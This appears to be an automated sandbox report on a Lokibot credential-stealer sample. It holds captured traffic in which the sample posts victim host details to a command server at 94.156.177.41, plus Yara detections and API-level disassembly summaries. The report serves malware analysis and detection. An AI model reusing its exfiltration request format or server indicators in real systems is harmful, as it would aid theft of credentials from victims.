Dec 9, 2024 08:53:21.134187937 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49984	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:21.394958019 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:21.514620066 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:23.236313105 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49990	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:23.508372068 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:23.627768993 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:25.096241951 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49994	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:25.359930992 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:25.479289055 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:26.917603970 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	50000	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:27.174834967 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:27.294179916 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:31.731527090 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	50014	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:32.131978989 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:32.251367092 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:34.080187082 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	50020	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:34.345973969 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:34.465270996 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:38.905452013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	50032	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:39.177046061 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:39.296364069 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C

Target ID:	0
Start time:	02:51:37
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\0yWVteGq5T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0yWVteGq5T.exe"
Imagebase:	0x400000
File size:	98'816 bytes
MD5 hash:	D7EDE461FD6438CFAE2CBA59FA1E07E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	31.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
